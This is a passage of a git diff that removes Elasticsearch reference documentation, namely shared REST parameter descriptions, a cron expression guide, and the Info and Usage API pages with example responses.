-tag::component-template[] -``:: -(Required, string) -Comma-separated list or wildcard expression of component template names -used to limit the request. -end::component-template[] - -tag::lenient[] -`lenient`:: -(Optional, Boolean) If `true`, format-based query failures (such as -providing text to a numeric field) will be ignored. Defaults to `false`. -end::lenient[] - -tag::level[] -`level`:: -+ --- -(Optional, string) -Indicates whether statistics are aggregated -at the cluster, index, or shard level. - -Valid values are: - -* `cluster` -* `indices` -* `shards` --- -end::level[] - -tag::local[] -`local`:: -(Optional, Boolean) If `true`, the request retrieves information from the local -node only. Defaults to `false`, which means information is retrieved from -the master node. -end::local[] - -tag::mappings[] -`mappings`:: -+ --- -(Optional, <>) Mapping for fields in the index. If -specified, this mapping can include: - -* Field names -* <> -* <> - -See <>. --- -end::mappings[] - -tag::max_docs[] -`max_docs`:: -(Optional, integer) Maximum number of documents to process. Defaults to all -documents. -end::max_docs[] - -tag::memory[] -Bytes of segment data stored in memory for efficient search, -such as `1264`. -+ -A value of `-1` indicates {es} was unable to compute this number. -end::memory[] - -tag::bulk-require-alias[] -`require_alias`:: -(Optional, Boolean) -If `true`, the action must target an <>. Defaults -to `false`. -end::bulk-require-alias[] - -tag::require-alias[] -`require_alias`:: -(Optional, Boolean) -If `true`, the destination must be an <>. Defaults to -`false`. -end::require-alias[] - -tag::node-filter[] -``:: -(Optional, string) -Comma-separated list of <> used to limit returned -information. Defaults to all nodes in the cluster. 
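Purely as an illustration of the filter syntax, and not tied to any particular API, role-based filters can be combined in the path. For example, the following request would target data nodes that are not master-eligible:

[source,console]
----
GET /_nodes/data:true,master:false/stats
----
// TEST[skip:illustrative node filter example]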
-end::node-filter[] - -tag::node-id[] -``:: -(Optional, string) Comma-separated list of node IDs or names used to limit -returned information. -end::node-id[] - -tag::node-id-query-parm[] -`node_id`:: -(Optional, string) -Comma-separated list of node IDs or names -used to limit returned information. -end::node-id-query-parm[] - -tag::offsets[] -``:: -(Optional, Boolean) If `true`, the response includes term offsets. -Defaults to `true`. -end::offsets[] - -tag::parent-task-id[] -`parent_task_id`:: -+ --- -(Optional, string) -Parent task ID -used to limit returned information. - -To return all tasks, -omit this parameter -or use a value of `-1`. --- -end::parent-task-id[] - -tag::payloads[] -`payloads`:: -(Optional, Boolean) If `true`, the response includes term payloads. -Defaults to `true`. -end::payloads[] - -tag::pipeline[] -`pipeline`:: -(Optional, string) ID of the pipeline to use to preprocess incoming documents. -end::pipeline[] - -tag::pages-processed[] -The number of search or bulk index operations processed. Documents are -processed in batches instead of individually. -end::pages-processed[] - -tag::pivot[] -The method for transforming the data. These objects define the pivot function -`group by` fields and the aggregation to reduce the data. -end::pivot[] - -tag::pivot-aggs[] -Defines how to aggregate the grouped data. The following aggregations are -currently supported: -+ --- -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- -end::pivot-aggs[] - -tag::pivot-group-by[] -Defines how to group the data. More than one grouping can be defined per pivot. -The following groupings are currently supported: -+ --- -* <<_date_histogram,Date histogram>> -* <<_geotile_grid,Geotile Grid>> -* <<_histogram,Histogram>> -* <<_terms,Terms>> - --- -end::pivot-group-by[] - -tag::positions[] -`positions`:: -(Optional, Boolean) If `true`, the response includes term positions. -Defaults to `true`. -end::positions[] - -tag::preference[] -`preference`:: -(Optional, string) Specifies the node or shard the operation should be -performed on. Random by default. -end::preference[] - -tag::processing-time-ms[] -The amount of time spent processing results, in milliseconds. -end::processing-time-ms[] - -tag::processing-total[] -The number of processing operations. -end::processing-total[] - -tag::search-q[] -`q`:: -(Optional, string) Query in the Lucene query string syntax. -end::search-q[] - -tag::query[] -`query`:: -(Optional, <>) Defines the search definition using the -<>. -end::query[] - -tag::realtime[] -`realtime`:: -(Optional, Boolean) If `true`, the request is real-time as opposed to near-real-time. -Defaults to `true`. See <>. -end::realtime[] - -tag::refresh[] -`refresh`:: -(Optional, enum) If `true`, {es} refreshes the affected shards to make this -operation visible to search, if `wait_for` then wait for a refresh to make -this operation visible to search, if `false` do nothing with refreshes. -Valid values: `true`, `false`, `wait_for`. Default: `false`. -end::refresh[] - -tag::request_cache[] -`request_cache`:: -(Optional, Boolean) If `true`, the request cache is used for this request. -Defaults to the index-level setting. -end::request_cache[] - -tag::requests_per_second[] -`requests_per_second`:: -(Optional, integer) The throttle for this request in sub-requests per second. -Defaults to `-1` (no throttle). -end::requests_per_second[] - -tag::routing[] -`routing`:: -(Optional, string) Target the specified primary shard. 
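As a hedged illustration of how the parameter is usually passed (the index name, document ID, and routing value are all invented):

[source,console]
----
GET /my-index-000001/_doc/1?routing=user-1
----
// TEST[skip:illustrative routing example]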
-end::routing[] - -tag::index-routing[] -`routing`:: -(Optional, string) -Custom <> -used to route operations to a specific shard. -end::index-routing[] - -tag::cat-s[] -`s`:: -(Optional, string) Comma-separated list of column names or column aliases used -to sort the response. -end::cat-s[] - -tag::scroll[] -`scroll`:: -(Optional, <>) Specifies how long a consistent view of -the index should be maintained for scrolled search. -end::scroll[] - -tag::scroll_size[] -`scroll_size`:: -(Optional, integer) Size of the scroll request that powers the operation. -Defaults to 1000. -end::scroll_size[] - -tag::search-failures[] -The number of search failures. -end::search-failures[] - -tag::search-time-ms[] -The amount of time spent searching, in milliseconds. -end::search-time-ms[] - -tag::search-total[] -The number of search operations on the source index for the {transform}. -end::search-total[] - -tag::search_type[] -`search_type`:: -(Optional, string) The type of the search operation. Available options: -* `query_then_fetch` -* `dfs_query_then_fetch` -end::search_type[] - -tag::segment[] -Name of the segment, such as `_0`. The segment name is derived from -the segment generation and used internally to create file names in the directory -of the shard. -end::segment[] - -tag::segment-search[] -If `true`, -the segment is searchable. -+ -If `false`, -the segment has most likely been written to disk -but needs a <> to be searchable. -end::segment-search[] - -tag::segment-size[] -Disk space used by the segment, such as `50kb`. -end::segment-size[] - -tag::settings[] -`settings`:: -(Optional, <>) Configuration -options for the index. See <>. -end::settings[] - -tag::target-index-settings[] -`settings`:: -(Optional, <>) -Configuration options for the target index. -See <>. -end::target-index-settings[] - -tag::size-transforms[] -Specifies the maximum number of {transforms} to obtain. The default value is -`100`. -end::size-transforms[] - -tag::slices[] -`slices`:: -(Optional, integer) The number of slices this task should be divided into. -Defaults to 1 meaning the task isn't sliced into subtasks. -end::slices[] - -tag::sort[] -`sort`:: -(Optional, string) A comma-separated list of : pairs. -end::sort[] - -tag::source[] -`_source`:: -(Optional, string) True or false to return the `_source` field or not, or a -list of fields to return. -end::source[] - -tag::source_excludes[] -`_source_excludes`:: -(Optional, string) -A comma-separated list of <> to exclude from -the response. -+ -You can also use this parameter to exclude fields from the subset specified in -`_source_includes` query parameter. -+ -If the `_source` parameter is `false`, this parameter is ignored. -end::source_excludes[] - -tag::source_includes[] -`_source_includes`:: -(Optional, string) -A comma-separated list of <> to -include in the response. -+ -If this parameter is specified, only these source fields are returned. You can -exclude fields from this subset using the `_source_excludes` query parameter. -+ -If the `_source` parameter is `false`, this parameter is ignored. -end::source_includes[] - -tag::source-transforms[] -The source of the data for the {transform}. -end::source-transforms[] - -tag::source-index-transforms[] -The _source indices_ for the {transform}. It can be a single index, an index -pattern (for example, `"my-index-*"`), an array of indices (for example, -`["my-index-000001", "my-index-000002"]`), or an array of index patterns (for example, -`["my-index-*", "my-other-index-*"]`. 
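Putting those forms together, the `source` section of a {transform} definition might look like the following sketch; the index names and query are invented and only show the accepted shapes:

[source,js]
----
{
  "source": {
    "index": ["my-index-000001", "my-other-index-*"],
    "query": {
      "term": { "user.id": "kimchy" }
    }
  }
}
----
// NOTCONSOLE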
-end::source-index-transforms[] - -tag::source-query-transforms[] -A query clause that retrieves a subset of data from the source index. See -<>. -end::source-query-transforms[] - -tag::state-transform[] -The status of the {transform}, which can be one of the following values: -+ --- -* `aborting`: The {transform} is aborting. -* `failed`: The {transform} failed. For more information about the failure, -check the reason field. -* `indexing`: The {transform} is actively processing data and creating new -documents. -* `started`: The {transform} is running but not actively indexing data. -* `stopped`: The {transform} is stopped. -* `stopping`: The {transform} is stopping. --- -end::state-transform[] - -tag::state-transform-reason[] -If a {transform} has a `failed` state, this property provides details about the -reason for the failure. -end::state-transform-reason[] - -tag::stats[] -`stats`:: -(Optional, string) Specific `tag` of the request for logging and statistical -purposes. -end::stats[] - -tag::stored_fields[] -`stored_fields`:: -(Optional, Boolean) If `true`, retrieves the document fields stored in the -index rather than the document `_source`. Defaults to `false`. -end::stored_fields[] - -tag::sync[] -Defines the properties {transforms} require to run continuously. -end::sync[] - -tag::sync-time[] -Specifies that the {transform} uses a time field to synchronize the source and -destination indices. -end::sync-time[] - -tag::sync-time-field[] -The date field that is used to identify new documents in the source. -end::sync-time-field[] - -tag::sync-time-delay[] -The time delay between the current time and the latest input data time. The -default value is `60s`. -end::sync-time-delay[] - -tag::transform-settings[] -Defines optional {transform} settings. -end::transform-settings[] - -tag::transform-settings-docs-per-second[] -Specifies a limit on the number of input documents per second. This setting -throttles the {transform} by adding a wait time between search requests. The -default value is `null`, which disables throttling. -end::transform-settings-docs-per-second[] - -tag::transform-settings-max-page-search-size[] -Defines the initial page size to use for the composite aggregation for each -checkpoint. If circuit breaker exceptions occur, the page size is dynamically -adjusted to a lower value. The minimum value is `10` and the maximum is `10,000`. -The default value is `500`. -end::transform-settings-max-page-search-size[] - -tag::target-index[] -``:: -+ --- -(Required, string) -Name of the target index to create. - -include::{es-repo-dir}/indices/create-index.asciidoc[tag=index-name-reqs] --- -end::target-index[] - -tag::task-id[] -``:: -(Optional, string) ID of the task to return -(`node_id:task_number`). -end::task-id[] - -tag::term_statistics[] -`term_statistics`:: -(Optional, Boolean) If `true`, the response includes term frequency and document frequency. -Defaults to `false`. -end::term_statistics[] - -tag::terminate_after[] -`terminate_after`:: -(Optional, integer) The maximum number of documents to collect for each shard, -upon reaching which the query execution will terminate early. -end::terminate_after[] - -tag::time[] -`time`:: -(Optional, <>) -Unit used to display time values. -end::time[] - -tag::timeoutparms[] -tag::master-timeout[] -`master_timeout`:: -(Optional, <>) -Period to wait for a connection to the master node. If no response is received -before the timeout expires, the request fails and returns an error. Defaults to -`30s`. 
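For example, any API that accepts this parameter takes it as a query string value; the index name here is hypothetical:

[source,console]
----
PUT /my-index-000001?master_timeout=60s
----
// TEST[skip:illustrative timeout example]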
-end::master-timeout[] - -tag::timeout[] -`timeout`:: -(Optional, <>) -Period to wait for a response. If no response is received before the timeout -expires, the request fails and returns an error. Defaults to `30s`. -end::timeout[] -end::timeoutparms[] - -tag::type[] -``:: -(Optional, string) -Comma-separated list or wildcard expression of types -used to limit the request. -end::type[] - -tag::transform-id[] -Identifier for the {transform}. This identifier can contain lowercase -alphanumeric characters (a-z and 0-9), hyphens, and underscores. It must start -and end with alphanumeric characters. -end::transform-id[] - -tag::transform-id-wildcard[] -Identifier for the {transform}. It can be a {transform} identifier or a wildcard -expression. If you do not specify one of these options, the API returns -information for all {transforms}. -end::transform-id-wildcard[] - -tag::trigger-count[] -The number of times the {transform} has been triggered by the scheduler. For -example, the scheduler triggers the {transform} indexer to check for updates -or ingest new data at an interval specified in the -<>. -end::trigger-count[] - -tag::cat-v[] -`v`:: -(Optional, Boolean) If `true`, the response includes column headings. -Defaults to `false`. -end::cat-v[] - -tag::version[] -`version`:: -(Optional, Boolean) If `true`, returns the document version as part of a hit. -end::version[] - -tag::doc-version[] -`version`:: -(Optional, integer) Explicit version number for concurrency control. -The specified version must match the current version of the document for the -request to succeed. -end::doc-version[] - -tag::segment-version[] -Version of Lucene used to write the segment. -end::segment-version[] - -tag::version_type[] -`version_type`:: -(Optional, enum) Specific version type: `internal`, `external`, -`external_gte`. -end::version_type[] - -tag::wait_for_active_shards[] -`wait_for_active_shards`:: -+ --- -(Optional, string) The number of shard copies that must be active before -proceeding with the operation. Set to `all` or any positive integer up -to the total number of shards in the index (`number_of_replicas+1`). -Default: 1, the primary shard. - -See <>. --- -end::wait_for_active_shards[] diff --git a/docs/reference/rest-api/cron-expressions.asciidoc b/docs/reference/rest-api/cron-expressions.asciidoc deleted file mode 100644 index d817974e154..00000000000 --- a/docs/reference/rest-api/cron-expressions.asciidoc +++ /dev/null @@ -1,182 +0,0 @@ -[[cron-expressions]] -=== Cron expressions - -A cron expression is a string of the following form: - -[source,txt] ------------------------------- - [year] ------------------------------- - -{es} uses the cron parser from the https://quartz-scheduler.org[Quartz Job Scheduler]. -For more information about writing Quartz cron expressions, see the -http://www.quartz-scheduler.org/documentation/quartz-2.3.0/tutorials/crontrigger.html[Quartz CronTrigger Tutorial]. - -All schedule times are in coordinated universal time (UTC); other timezones are not supported. - -TIP: You can use the <> command line tool to validate your cron expressions. - - -[[cron-elements]] -==== Cron expression elements - -All elements are required except for `year`. -See <> for information about the allowed special characters. 
- -``:: -(Required) -Valid values: `0`-`59` and the special characters `,` `-` `*` `/` - -``:: -(Required) -Valid values: `0`-`59` and the special characters `,` `-` `*` `/` - -``:: -(Required) -Valid values: `0`-`23` and the special characters `,` `-` `*` `/` - -``:: -(Required) -Valid values: `1`-`31` and the special characters `,` `-` `*` `/` `?` `L` `W` - -``:: -(Required) -Valid values: `1`-`12`, `JAN`-`DEC`, `jan`-`dec`, and the special characters `,` `-` `*` `/` - -``:: -(Required) -Valid values: `1`-`7`, `SUN`-`SAT`, `sun`-`sat`, and the special characters `,` `-` `*` `/` `?` `L` `#` - -``:: -(Optional) -Valid values: `1970`-`2099` and the special characters `,` `-` `*` `/` - -[[cron-special-characters]] -==== Cron special characters - -`*`:: -Selects every possible value for a field. For -example, `*` in the `hours` field means "every hour". - -`?`:: -No specific value. Use when you don't care what the value -is. For example, if you want the schedule to trigger on a -particular day of the month, but don't care what day of -the week that happens to be, you can specify `?` in the -`day_of_week` field. - -`-`:: -A range of values (inclusive). Use to separate a minimum -and maximum value. For example, if you want the schedule -to trigger every hour between 9:00 a.m. and 5:00 p.m., you -could specify `9-17` in the `hours` field. - -`,`:: -Multiple values. Use to separate multiple values for a -field. For example, if you want the schedule to trigger -every Tuesday and Thursday, you could specify `TUE,THU` -in the `day_of_week` field. - -`/`:: -Increment. Use to separate values when specifying a time -increment. The first value represents the starting point, -and the second value represents the interval. For example, -if you want the schedule to trigger every 20 minutes -starting at the top of the hour, you could specify `0/20` -in the `minutes` field. Similarly, specifying `1/5` in -`day_of_month` field will trigger every 5 days starting on -the first day of the month. - -`L`:: -Last. Use in the `day_of_month` field to mean the last day -of the month--day 31 for January, day 28 for February in -non-leap years, day 30 for April, and so on. Use alone in -the `day_of_week` field in place of `7` or `SAT`, or after -a particular day of the week to select the last day of that -type in the month. For example `6L` means the last Friday -of the month. You can specify `LW` in the `day_of_month` -field to specify the last weekday of the month. Avoid using -the `L` option when specifying lists or ranges of values, -as the results likely won't be what you expect. - -`W`:: -Weekday. Use to specify the weekday (Monday-Friday) nearest -the given day. As an example, if you specify `15W` in the -`day_of_month` field and the 15th is a Saturday, the -schedule will trigger on the 14th. If the 15th is a Sunday, -the schedule will trigger on Monday the 16th. If the 15th -is a Tuesday, the schedule will trigger on Tuesday the 15th. -However if you specify `1W` as the value for `day_of_month`, -and the 1st is a Saturday, the schedule will trigger on -Monday the 3rd--it won't jump over the month boundary. You -can specify `LW` in the `day_of_month` field to specify the -last weekday of the month. You can only use the `W` option -when the `day_of_month` is a single day--it is not valid -when specifying a range or list of days. - -`#`:: -Nth XXX day in a month. Use in the `day_of_week` field to -specify the nth XXX day of the month. 
For example, if you -specify `6#1`, the schedule will trigger on the first -Friday of the month. Note that if you specify `3#5` and -there are not 5 Tuesdays in a particular month, the -schedule won't trigger that month. - -[[cron-expression-examples]] -==== Examples - -[[cron-example-daily]] -===== Setting daily triggers - -`0 5 9 * * ?`:: -Trigger at 9:05 a.m. UTC every day. - -`0 5 9 * * ? 2020`:: -Trigger at 9:05 a.m. UTC every day during the year 2020. - -[[cron-example-range]] -===== Restricting triggers to a range of days or times - -`0 5 9 ? * MON-FRI`:: -Trigger at 9:05 a.m. UTC Monday through Friday. - -`0 0-5 9 * * ?`:: -Trigger every minute starting at 9:00 a.m. UTC and ending at 9:05 a.m. UTC every day. - -[[cron-example-interval]] -===== Setting interval triggers - -`0 0/15 9 * * ?`:: -Trigger every 15 minutes starting at 9:00 a.m. UTC and ending at 9:45 a.m. UTC every day. - -`0 5 9 1/3 * ?`:: -Trigger at 9:05 a.m. UTC every 3 days every month, starting on the first day of the month. - -[[cron-example-day]] -===== Setting schedules that trigger on a particular day - -`0 1 4 1 4 ?`:: -Trigger every April 1st at 4:01 a.m. UTC. -`0 0,30 9 ? 4 WED`:: -Trigger at 9:00 a.m. UTC and at 9:30 a.m. UTC every Wednesday in the month of April. - -`0 5 9 15 * ?`:: -Trigger at 9:05 a.m. UTC on the 15th day of every month. - -`0 5 9 15W * ?`:: -Trigger at 9:05 a.m. UTC on the nearest weekday to the 15th of every month. - -`0 5 9 ? * 6#1`:: -Trigger at 9:05 a.m. UTC on the first Friday of every month. - -[[cron-example-last]] -===== Setting triggers using last - -`0 5 9 L * ?`:: -Trigger at 9:05 a.m. UTC on the last day of every month. - -`0 5 9 ? * 2L`:: -Trigger at 9:05 a.m. UTC on the last Monday of every month. - -`0 5 9 LW * ?`:: -Trigger at 9:05 a.m. UTC on the last weekday of every month. diff --git a/docs/reference/rest-api/defs.asciidoc b/docs/reference/rest-api/defs.asciidoc deleted file mode 100644 index 405d738712e..00000000000 --- a/docs/reference/rest-api/defs.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[role="xpack"] -[[api-definitions]] -== Definitions - -The role mappings resource definition you can find below is used in APIs related -to {security-features}. - -* <> - - -include::{xes-repo-dir}/rest-api/security/role-mapping-resources.asciidoc[] diff --git a/docs/reference/rest-api/index.asciidoc b/docs/reference/rest-api/index.asciidoc deleted file mode 100644 index 0e0f2218fd0..00000000000 --- a/docs/reference/rest-api/index.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[[rest-apis]] -= REST APIs - -[partintro] --- -{es} exposes REST APIs that are used by the UI components and can be called -directly to configure and access {es} features. - -[NOTE] -We are working on including more {es} APIs in this section. Some content might -not be included yet. 
- -* <> -ifdef::permanently-unreleased-branch[] -* <> -endif::[] -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> --- - -include::{es-repo-dir}/api-conventions.asciidoc[] -ifdef::permanently-unreleased-branch[] -include::{es-repo-dir}/autoscaling/apis/autoscaling-apis.asciidoc[] -endif::[] -include::{es-repo-dir}/cat.asciidoc[] -include::{es-repo-dir}/cluster.asciidoc[] -include::{es-repo-dir}/ccr/apis/ccr-apis.asciidoc[] -include::{es-repo-dir}/data-streams/data-stream-apis.asciidoc[] -include::{es-repo-dir}/docs.asciidoc[] -include::{es-repo-dir}/ingest/apis/enrich/index.asciidoc[] -include::{es-repo-dir}/graph/explore.asciidoc[] -include::{es-repo-dir}/indices.asciidoc[] -include::{es-repo-dir}/ilm/apis/ilm-api.asciidoc[] -include::{es-repo-dir}/ingest/apis/index.asciidoc[] -include::info.asciidoc[] -include::{es-repo-dir}/licensing/index.asciidoc[] -include::{es-repo-dir}/ml/anomaly-detection/apis/index.asciidoc[] -include::{es-repo-dir}/ml/df-analytics/apis/index.asciidoc[] -include::{es-repo-dir}/migration/migration.asciidoc[] -include::{es-repo-dir}/indices/apis/reload-analyzers.asciidoc[] -include::{es-repo-dir}/repositories-metering-api/repositories-metering-apis.asciidoc[] -include::{es-repo-dir}/rollup/rollup-api.asciidoc[] -include::{es-repo-dir}/search.asciidoc[] -include::{es-repo-dir}/searchable-snapshots/apis/searchable-snapshots-apis.asciidoc[] -include::{xes-repo-dir}/rest-api/security.asciidoc[] -include::{es-repo-dir}/snapshot-restore/apis/snapshot-restore-apis.asciidoc[] -include::{es-repo-dir}/slm/apis/slm-api.asciidoc[] -include::{es-repo-dir}/transform/apis/index.asciidoc[] -include::usage.asciidoc[] -include::{xes-repo-dir}/rest-api/watcher.asciidoc[] -include::defs.asciidoc[] diff --git a/docs/reference/rest-api/info.asciidoc b/docs/reference/rest-api/info.asciidoc deleted file mode 100644 index 50c87fe99e1..00000000000 --- a/docs/reference/rest-api/info.asciidoc +++ /dev/null @@ -1,188 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[info-api]] -== Info API - -Provides general information about the installed {xpack} features. - -[discrete] -[[info-api-request]] -=== {api-request-title} - -`GET /_xpack` - -[discrete] -[[info-api-desc]] -=== {api-description-title} - -The information provided by this API includes: - -* Build Information - including the build number and timestamp. -* License Information - basic information about the currently installed license. -* Features Information - The features that are currently enabled and available - under the current license. - -[discrete] -[[info-api-path-params]] -=== {api-path-parms-title} - -`categories`:: - (Optional, list) A comma-separated list of the information categories to - include in the response. For example, `build,license,features`. - -`human`:: - (Optional, Boolean) Defines whether additional human-readable information is - included in the response. In particular, it adds descriptions and a tag line. - The default value is `true`. 
- -[discrete] -[[info-api-example]] -=== {api-examples-title} - -The following example queries the info API: - -[source,console] ------------------------------------------------------------- -GET /_xpack ------------------------------------------------------------- - -Example response: - -[source,console-result] ------------------------------------------------------------- -{ - "build" : { - "hash" : "2798b1a3ce779b3611bb53a0082d4d741e4d3168", - "date" : "2015-04-07T13:34:42Z" - }, - "license" : { - "uid" : "893361dc-9749-4997-93cb-xxx", - "type" : "trial", - "mode" : "trial", - "status" : "active", - "expiry_date_in_millis" : 1542665112332 - }, - "features" : { - "ccr" : { - "available" : true, - "enabled" : true - }, - "analytics" : { - "available" : true, - "enabled" : true - }, - "enrich" : { - "available" : true, - "enabled" : true - }, - "flattened" : { - "available" : true, - "enabled" : true - }, - "frozen_indices" : { - "available" : true, - "enabled" : true - }, - "graph" : { - "available" : true, - "enabled" : true - }, - "ilm" : { - "available" : true, - "enabled" : true - }, - "logstash" : { - "available" : true, - "enabled" : true - }, - "ml" : { - "available" : true, - "enabled" : true, - "native_code_info" : { - "version" : "7.0.0-alpha1-SNAPSHOT", - "build_hash" : "99a07c016d5a73" - } - }, - "monitoring" : { - "available" : true, - "enabled" : true - }, - "rollup": { - "available": true, - "enabled": true - }, - "searchable_snapshots" : { - "available" : true, - "enabled" : true - }, - "security" : { - "available" : true, - "enabled" : false - }, - "slm" : { - "available" : true, - "enabled" : true - }, - "spatial" : { - "available" : true, - "enabled" : true - }, - "eql" : { - "available" : true, - "enabled" : true - }, - "sql" : { - "available" : true, - "enabled" : true - }, - "transform" : { - "available" : true, - "enabled" : true - }, - "vectors" : { - "available" : true, - "enabled" : true - }, - "voting_only" : { - "available" : true, - "enabled" : true - }, - "watcher" : { - "available" : true, - "enabled" : true - }, - "data_streams" : { - "available" : true, - "enabled" : true, - }, - "data_tiers" : { - "available" : true, - "enabled" : true, - } - }, - "tagline" : "You know, for X" -} ------------------------------------------------------------- -// TESTRESPONSE[s/"hash" : "2798b1a3ce779b3611bb53a0082d4d741e4d3168",/"hash" : "$body.build.hash",/] -// TESTRESPONSE[s/"date" : "2015-04-07T13:34:42Z"/"date" : "$body.build.date"/] -// TESTRESPONSE[s/"uid" : "893361dc-9749-4997-93cb-xxx",/"uid": "$body.license.uid",/] -// TESTRESPONSE[s/"expiry_date_in_millis" : 1542665112332/"expiry_date_in_millis" : "$body.license.expiry_date_in_millis"/] -// TESTRESPONSE[s/"version" : "7.0.0-alpha1-SNAPSHOT",/"version": "$body.features.ml.native_code_info.version",/] -// TESTRESPONSE[s/"build_hash" : "99a07c016d5a73"/"build_hash": "$body.features.ml.native_code_info.build_hash"/] -// TESTRESPONSE[s/"eql" : \{[^\}]*\},/"eql": $body.$_path,/] -// eql is disabled by default on release builds and enabled everywhere else during the initial implementation phase until its release -// So much s/// but at least we test that the layout is close to matching.... 
- -The following example only returns the build and features information: - -[source,console] ------------------------------------------------------------- -GET /_xpack?categories=build,features ------------------------------------------------------------- - -The following example removes the descriptions from the response: - -[source,console] ------------------------------------------------------------- -GET /_xpack?human=false ------------------------------------------------------------- diff --git a/docs/reference/rest-api/usage.asciidoc b/docs/reference/rest-api/usage.asciidoc deleted file mode 100644 index 7289b0d27b6..00000000000 --- a/docs/reference/rest-api/usage.asciidoc +++ /dev/null @@ -1,370 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[usage-api]] -== Usage API - -Provides usage information about the installed {xpack} features. - -[discrete] -[[usage-api-request]] -=== {api-request-title} - -`GET /_xpack/usage` - -[discrete] -[[usage-api-desc]] -=== {api-description-title} - -This API provides information about which features are currently enabled and -available under the current license and some usage statistics. - -[discrete] -[[usage-api-query-parms]] -=== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[discrete] -[[usage-api-example]] -=== {api-examples-title} - -[source,console] ------------------------------------------------------------- -GET /_xpack/usage ------------------------------------------------------------- - -[source,console-result] ------------------------------------------------------------- -{ - "security" : { - "available" : true, - "enabled" : false, - "ssl" : { - "http" : { - "enabled" : false - }, - "transport" : { - "enabled" : false - } - } - }, - "monitoring" : { - "available" : true, - "enabled" : true, - "collection_enabled" : false, - "enabled_exporters" : { - "local" : 1 - } - }, - "watcher" : { - "available" : true, - "enabled" : true, - "execution" : { - "actions" : { - "_all" : { - "total" : 0, - "total_time_in_ms" : 0 - } - } - }, - "watch" : { - "input" : { - "_all" : { - "total" : 0, - "active" : 0 - } - }, - "trigger" : { - "_all" : { - "total" : 0, - "active" : 0 - } - } - }, - "count" : { - "total" : 0, - "active" : 0 - } - }, - "graph" : { - "available" : true, - "enabled" : true - }, - "ml" : { - "available" : true, - "enabled" : true, - "jobs" : { - "_all" : { - "count" : 0, - "detectors" : { - ... - }, - "created_by" : { }, - "model_size" : { - ... 
- }, - "forecasts" : { - "total" : 0, - "forecasted_jobs" : 0 - } - } - }, - "datafeeds" : { - "_all" : { - "count" : 0 - } - }, - "data_frame_analytics_jobs" : { - "_all" : { - "count" : 0 - } - }, - "inference" : { - "ingest_processors" : { - "_all" : { - "num_docs_processed" : { - "max" : 0, - "sum" : 0, - "min" : 0 - }, - "pipelines" : { - "count" : 0 - }, - "num_failures" : { - "max" : 0, - "sum" : 0, - "min" : 0 - }, - "time_ms" : { - "max" : 0, - "sum" : 0, - "min" : 0 - } - } - }, - "trained_models" : { - "_all" : { - "count" : 0 - } - } - }, - "node_count" : 1 - }, - "logstash" : { - "available" : true, - "enabled" : true - }, - "eql" : { - "available" : true, - "enabled" : true - }, - "sql" : { - "available" : true, - "enabled" : true, - "features" : { - "having" : 0, - "subselect" : 0, - "limit" : 0, - "orderby" : 0, - "where" : 0, - "join" : 0, - "groupby" : 0, - "command" : 0, - "local" : 0 - }, - "queries" : { - "rest" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "cli" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "canvas" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "odbc" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "jdbc" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "odbc32" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "odbc64" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "_all" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "translate" : { - "count" : 0 - } - } - }, - "rollup" : { - "available" : true, - "enabled" : true - }, - "ilm" : { - "policy_count" : 3, - "policy_stats" : [ - ... - ] - }, - "slm" : { - "available" : true, - "enabled" : true - }, - "ccr" : { - "available" : true, - "enabled" : true, - "follower_indices_count" : 0, - "auto_follow_patterns_count" : 0 - }, - "enrich" : { - "available" : true, - "enabled" : true - }, - "transform" : { - "available" : true, - "enabled" : true - }, - "flattened" : { - "available" : true, - "enabled" : true, - "field_count" : 0 - }, - "vectors" : { - "available" : true, - "enabled" : true, - "dense_vector_fields_count" : 0, - "dense_vector_dims_avg_count" : 0, - "sparse_vector_fields_count" : 0 - }, - "voting_only" : { - "available" : true, - "enabled" : true - }, - "searchable_snapshots" : { - "available" : true, - "enabled" : true, - "indices_count" : 0 - }, - "frozen_indices" : { - "available" : true, - "enabled" : true, - "indices_count" : 0 - }, - "spatial" : { - "available" : true, - "enabled" : true - }, - "analytics" : { - "available" : true, - "enabled" : true, - "stats": { - "boxplot_usage" : 0, - "top_metrics_usage" : 0, - "normalize_usage" : 0, - "cumulative_cardinality_usage" : 0, - "t_test_usage" : 0, - "rate_usage" : 0, - "string_stats_usage" : 0, - "moving_percentiles_usage" : 0 - } - }, - "data_streams" : { - "available" : true, - "enabled" : true, - "data_streams" : 0, - "indices_count" : 0 - }, - "data_tiers" : { - "available" : true, - "enabled" : true, - "data_warm" : { - "node_count" : 0, - "index_count" : 0, - "total_shard_count" : 0, - "primary_shard_count" : 0, - "doc_count" : 0, - "total_size_bytes" : 0, - "primary_size_bytes" : 0, - "primary_shard_size_avg_bytes" : 0, - "primary_shard_size_median_bytes" : 0, - "primary_shard_size_mad_bytes" : 0 - }, - "data_cold" : { - "node_count" : 0, - "index_count" : 0, - "total_shard_count" : 0, - "primary_shard_count" : 0, - "doc_count" : 0, - "total_size_bytes" : 0, - "primary_size_bytes" : 0, - "primary_shard_size_avg_bytes" : 0, - "primary_shard_size_median_bytes" 
